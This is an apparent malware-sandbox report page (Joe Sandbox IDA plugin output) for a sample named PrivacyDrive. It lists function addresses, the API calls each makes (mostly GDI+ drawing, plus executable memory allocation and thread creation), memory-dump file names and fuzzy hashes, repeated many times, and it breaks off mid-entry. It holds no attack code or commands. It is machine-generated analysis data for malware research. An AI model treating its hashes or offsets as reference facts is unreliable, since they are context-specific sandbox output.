                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: GdipImage$HeightWidth
                                • String ID:
                                • API String ID: 87155632-0
                                • Opcode ID: 01ca607efc6987e50454d0ac0c589fa5940be2f02992de76c80933b756efaab0
                                • Instruction ID: ef7eefa47ee764ffd29c69b0a2d180fbcf29540d28d2dac7ed1d7bb482df8181
                                • Opcode Fuzzy Hash: 01ca607efc6987e50454d0ac0c589fa5940be2f02992de76c80933b756efaab0
                                • Instruction Fuzzy Hash: 53414E762043069FCB14CF18D994B5ABBE4FF88300F04896EF8899B361D730D819CBA6
                                Function 00468A20 Relevance: 6.1, APIs: 4, Instructions: 105COMMON
                                Download Yara Rule
                                APIs
                                • GdipCreateStringFormat.GDIPLUS(00000000,00000000,?,7563D392,?,?,?,7563D392), ref: 00468A7C
                                • GdipSetStringFormatAlign.GDIPLUS(?,00000000), ref: 00468B92
                                • GdipSetStringFormatLineAlign.GDIPLUS(?,00000001), ref: 00468BA3
                                • GdipSetStringFormatFlags.GDIPLUS(?,00001000), ref: 00468BB7
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: FormatGdipString$Align$CreateFlagsLine
                                • String ID:
                                • API String ID: 1889025379-0
                                • Opcode ID: 238f6470b80f116bdf0a66e6890ebfc5d578ce8fffd0367f98eecdcea9b942af
                                • Instruction ID: 6da09c564046291b8ce948ae55f5e98dc09cdec443b53f9bec64c259635cab97
                                • Opcode Fuzzy Hash: 238f6470b80f116bdf0a66e6890ebfc5d578ce8fffd0367f98eecdcea9b942af
                                • Instruction Fuzzy Hash: FF5122B0801345DEEB15CF54C91879ABFF4FF02318F20819DD048AF291D3BA9A0ADB91
                                Function 00415180 Relevance: 6.1, APIs: 4, Instructions: 92COMMON
                                Download Yara Rule
                                APIs
                                • GdipDrawImage.GDIPLUS(?,00000000), ref: 004151F7
                                • GdipCreateStringFormat.GDIPLUS(00000000,00000000,?,?,?,?,?,?,?,?,?,?,00539A78,000000FF), ref: 00415215
                                • GdipSetStringFormatAlign.GDIPLUS(?,00000002), ref: 0041522D
                                • GdipDeleteStringFormat.GDIPLUS(00000000,?,00000000,?,?,00000021,?,FF414141), ref: 00415295
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: Gdip$FormatString$AlignCreateDeleteDrawImage
                                • String ID:
                                • API String ID: 3591613321-0
                                • Opcode ID: df4b83b9adf1b523246b0ce8e097a9382144786572122b45ea30d5d0c6b13612
                                • Instruction ID: 6dfbc7c8ebecd59f608c0fea9eef570648a8622311eb76a0c6e5ea3eb3f79d85
                                • Opcode Fuzzy Hash: df4b83b9adf1b523246b0ce8e097a9382144786572122b45ea30d5d0c6b13612
                                • Instruction Fuzzy Hash: 9E313775608701EFD715CF28C884B96BBE8FF99750F14471AF859A72A0DB30A844CBA5
                                Function 004CC2E0 Relevance: 6.1, APIs: 4, Instructions: 91COMMON
                                Download Yara Rule
                                APIs
                                • GdipCreateStringFormat.GDIPLUS(00000000,00000000,FF414141,7563D392,?), ref: 004CC368
                                • GdipSetTextRenderingHint.GDIPLUS(00000000,00000005), ref: 004CC37F
                                • GdipMeasureString.GDIPLUS(00000000,?,000000FF,00000000,?,00000000,00000000,?,?), ref: 004CC3B7
                                • GdipDeleteStringFormat.GDIPLUS(00000000), ref: 004CC3F0
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: Gdip$String$Format$CreateDeleteHintMeasureRenderingText
                                • String ID:
                                • API String ID: 3263196359-0
                                • Opcode ID: 2b4f6c61aee7b9e45ebd9a6a4a7a28c41125c3560ef1e8b05b255a746f50fb74
                                • Instruction ID: 09e53d610c01f2ae1211616a80f7272732c49c8845eccaa2798b86226e55fb17
                                • Opcode Fuzzy Hash: 2b4f6c61aee7b9e45ebd9a6a4a7a28c41125c3560ef1e8b05b255a746f50fb74
                                • Instruction Fuzzy Hash: 93413371A10249EFDB02CF60D884B9EBBB8FF09314F10822AE815B7290E775A895DF50
                                Function 00409220 Relevance: 6.1, APIs: 4, Instructions: 88COMMON
                                Download Yara Rule
                                APIs
                                • GdipGetImageHeight.GDIPLUS(?,?), ref: 00409248
                                • GdipGetImageWidth.GDIPLUS(?,?), ref: 0040926F
                                • GdipGetImageHeight.GDIPLUS(?,?), ref: 004092C7
                                • GdipGetImageWidth.GDIPLUS(?,?), ref: 004092EE
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: GdipImage$HeightWidth
                                • String ID:
                                • API String ID: 87155632-0
                                • Opcode ID: 790e16419a5339ed3242f5b8c1d1355ae43437fe184ec655f85a61c521b8808a
                                • Instruction ID: eed248b9beef3cb492fa3724ae78c1d6ee375514bd793ae0381193ca8f78f0f9
                                • Opcode Fuzzy Hash: 790e16419a5339ed3242f5b8c1d1355ae43437fe184ec655f85a61c521b8808a
                                • Instruction Fuzzy Hash: A7311CB1104606AFC750DF29D884B9AF7E9FB94310F14492EF9A8D3290DB30E954DBA5
                                Function 00409330 Relevance: 6.1, APIs: 4, Instructions: 88COMMON
                                Download Yara Rule
                                APIs
                                • GdipGetImageHeight.GDIPLUS(?,?), ref: 00409358
                                • GdipGetImageWidth.GDIPLUS(?,?), ref: 0040937F
                                • GdipGetImageHeight.GDIPLUS(?,?), ref: 004093D7
                                • GdipGetImageWidth.GDIPLUS(?,?), ref: 004093FE
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: GdipImage$HeightWidth
                                • String ID:
                                • API String ID: 87155632-0
                                • Opcode ID: 2672969cb5bb4fcc671a0426559697d75ed217e437baea6568ddbb9bf92a8ab4
                                • Instruction ID: a82a16ee1349a0d43971f9266b75aa98ef81c277b78cc4d967d64c43aabd7ee8
                                • Opcode Fuzzy Hash: 2672969cb5bb4fcc671a0426559697d75ed217e437baea6568ddbb9bf92a8ab4
                                • Instruction Fuzzy Hash: 74311CB1204606AFC710CF29D884B9BB7E8FB94311F10462EF9A8D3291D730E918CBA5
                                Function 004525F0 Relevance: 6.1, APIs: 4, Instructions: 88COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 004CBC00: GdipCreateSolidFill.GDIPLUS(?,FFFFFFFF), ref: 004CBC55
                                  • Part of subcall function 004CBC00: GdipFillRectangle.GDIPLUS(?,00000000), ref: 004CBCAB
                                  • Part of subcall function 004CBC00: GdipDeleteBrush.GDIPLUS(00000000), ref: 004CBCC7
                                • GdipCreateStringFormat.GDIPLUS(00000000,00000000,FFF2F2F2,?,00000001,00000000,000000BD,?,?,00000001,00000001), ref: 0045266F
                                • GdipSetStringFormatAlign.GDIPLUS(FFFFFFFF,00000002,?,?,?,?,?,?,?,?,?,?,?,?,?,00539A78), ref: 00452687
                                • GdipSetStringFormatLineAlign.GDIPLUS(FFFFFFFF,00000002,?,?,?,?,?,?,?,?,?,?,?,?,?,00539A78), ref: 004526A0
                                • GdipDeleteStringFormat.GDIPLUS(00000000,?,00000000,00000000,000000AA,0000001E,FFFFFFFF,FF1B64B1), ref: 00452700
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: Gdip$FormatString$AlignCreateDeleteFill$BrushLineRectangleSolid
                                • String ID:
                                • API String ID: 2519554343-0
                                • Opcode ID: 3dc3701e2667b9d0af440eadf2f274fad97db4e9b81e2eb19c6b4b3ba539e488
                                • Instruction ID: 1d84103dc9312e43c9005ea9e280662007978bdbdab233804babd63aba5da95e
                                • Opcode Fuzzy Hash: 3dc3701e2667b9d0af440eadf2f274fad97db4e9b81e2eb19c6b4b3ba539e488
                                • Instruction Fuzzy Hash: E1317A70208306AFDB10CF14CC86F5ABBE4FB99714F000A2DF955A72E1DB70E9089B96
                                Function 0043A870 Relevance: 6.1, APIs: 4, Instructions: 84COMMON
                                Download Yara Rule
                                APIs
                                • GdipGetImageHeight.GDIPLUS(?,?), ref: 0043A89D
                                • GdipGetImageWidth.GDIPLUS(?,00000000), ref: 0043A8C4
                                • GdipGetImageHeight.GDIPLUS(?,?), ref: 0043A915
                                • GdipGetImageWidth.GDIPLUS(?,?), ref: 0043A93C
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: GdipImage$HeightWidth
                                • String ID:
                                • API String ID: 87155632-0
                                • Opcode ID: 7ed8786ce8983080883bbac97167c866f6a9aee26c424e72e99940aeba778a02
                                • Instruction ID: d8b839f922d5a463f828fb4bc3599796ddfd93813000dc7badc7289ef24a3618
                                • Opcode Fuzzy Hash: 7ed8786ce8983080883bbac97167c866f6a9aee26c424e72e99940aeba778a02
                                • Instruction Fuzzy Hash: 5E312BB120470BAFD760DF29D844B5ABBE8FF44311F108A2DE599D7250DB30E829DBA5
                                Function 004081B0 Relevance: 6.1, APIs: 4, Instructions: 83COMMON
                                Download Yara Rule
                                APIs
                                • GdipGetImageHeight.GDIPLUS(?,?), ref: 004081E1
                                • GdipGetImageWidth.GDIPLUS(?,00000000), ref: 0040820C
                                • GdipGetImageHeight.GDIPLUS(?,?), ref: 00408240
                                • GdipGetImageWidth.GDIPLUS(?,00000000), ref: 0040826B
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: GdipImage$HeightWidth
                                • String ID:
                                • API String ID: 87155632-0
                                • Opcode ID: e883daf9a574172d3fc4126492fff0070f63e511ddc0a21f382956b3331f8e60
                                • Instruction ID: eaa291464c2561fdeaef69911abea5bb1afba1cd30948bb03a6afac51bd30a47
                                • Opcode Fuzzy Hash: e883daf9a574172d3fc4126492fff0070f63e511ddc0a21f382956b3331f8e60
                                • Instruction Fuzzy Hash: 1B31C7712047069FD710CF29D984B6AB7E8FB49310F04456DE9A5D72A0DB30E918DBA5
                                Function 004080B0 Relevance: 6.1, APIs: 4, Instructions: 82COMMON
                                Download Yara Rule
                                APIs
                                • GdipGetImageHeight.GDIPLUS(?,?), ref: 004080E1
                                • GdipGetImageWidth.GDIPLUS(?,00000000), ref: 0040810C
                                • GdipGetImageHeight.GDIPLUS(?,?), ref: 00408140
                                • GdipGetImageWidth.GDIPLUS(?,00000000), ref: 0040816B
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: GdipImage$HeightWidth
                                • String ID:
                                • API String ID: 87155632-0
                                • Opcode ID: 0d5d2bcf955e9eb29db1cfa891ab922e48e8c60a111d25280c1e983a9cbd6f44
                                • Instruction ID: 71f86ceb0c113d1c4f77e10cb63fb7466350600d4cc0eddc6de9fe9586f759d2
                                • Opcode Fuzzy Hash: 0d5d2bcf955e9eb29db1cfa891ab922e48e8c60a111d25280c1e983a9cbd6f44
                                • Instruction Fuzzy Hash: 4231F671204706AFD710CF29D984B6AB7E8FF49310F044929F9A4DB3A0DB70E919DBA5
                                Function 004D44A0 Relevance: 6.1, APIs: 4, Instructions: 72memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualAlloc.KERNEL32(00000000,00000014,00001000,00000040,?,004A0394,7563D392), ref: 004D44B4
                                • GetCurrentProcess.KERNEL32(?,00000014), ref: 004D4512
                                • FlushInstructionCache.KERNEL32(00000000), ref: 004D4519
                                • __CxxThrowException@8.LIBCMT ref: 004D452E
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: AllocCacheCurrentException@8FlushInstructionProcessThrowVirtual
                                • String ID:
                                • API String ID: 3709139884-0
                                • Opcode ID: 71e273d7a94be286fc0c34758cc5e5905f94dc499e1a164b2308cfb9b7a594c8
                                • Instruction ID: b222feb8e67fb99a3f814bfec14a702971000c057ad641c91edc747636acf3c0
                                • Opcode Fuzzy Hash: 71e273d7a94be286fc0c34758cc5e5905f94dc499e1a164b2308cfb9b7a594c8
                                • Instruction Fuzzy Hash: BF2195742047909FD321DB59D81DF42BBD0AF19715F04858AF6898B7D2C3B4E804CB95
                                Function 004BFAD0 Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                                Download Yara Rule
                                APIs
                                • _memset.LIBCMT ref: 004BFAF7
                                • EnumDisplayDevicesW.USER32(00000000,00000000,00000348,00000000), ref: 004BFB15
                                • _memset.LIBCMT ref: 004BFB2D
                                • EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 004BFB51
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: DisplayEnum_memset$DevicesSettings
                                • String ID:
                                • API String ID: 393846559-0
                                • Opcode ID: e63ca8833ebd4cda18983cadefa2316590b4b6ff2c1d5f3f6b262b5332a59acf
                                • Instruction ID: 3b8c643780a38a271a85d6bf28069f7aa1eba69d8a6f0cd904ccbf8cec43a959
                                • Opcode Fuzzy Hash: e63ca8833ebd4cda18983cadefa2316590b4b6ff2c1d5f3f6b262b5332a59acf
                                • Instruction Fuzzy Hash: C6216671B002199BDB10DF65DC45BADB7B8FF44314F4085BAE90CD7281EB34AA58CB58
                                Function 004CB9E0 Relevance: 6.1, APIs: 4, Instructions: 62COMMON
                                Download Yara Rule
                                APIs
                                • GdipCreatePen1.GDIPLUS(7563D392,7563D392,00000000,7563D392), ref: 004CBA22
                                • GdipSetPenDashStyle.GDIPLUS(00000000,?), ref: 004CBA38
                                • GdipDrawRectangle.GDIPLUS(?,?), ref: 004CBA8B
                                • GdipDeletePen.GDIPLUS(?), ref: 004CBAA2
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: Gdip$CreateDashDeleteDrawPen1RectangleStyle
                                • String ID:
                                • API String ID: 3237614580-0
                                • Opcode ID: 596aac0cede70a002ed652ac91bdc068e3e4b3e5198298a525b2d2845ae00aa4
                                • Instruction ID: 619d04884841da13c97691cdcbf79b00e93f4e1e79ab35f934c09257ec004dbe
                                • Opcode Fuzzy Hash: 596aac0cede70a002ed652ac91bdc068e3e4b3e5198298a525b2d2845ae00aa4
                                • Instruction Fuzzy Hash: D521F63191474AEFDB01DF65C805BAEBBB4FF5A310F10871AE415B32A0E771A994EB80
                                Function 004346C0 Relevance: 6.1, APIs: 4, Instructions: 55windowthreadCOMMON
                                Download Yara Rule
                                APIs
                                • CreateThread.KERNEL32(00000000,00000000,004347C0,?,00000000,00000000), ref: 004346E8
                                • PostMessageW.USER32(00000000), ref: 0043471D
                                • PostMessageW.USER32(00000000), ref: 0043472D
                                • PostMessageW.USER32(00000000), ref: 0043473D
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
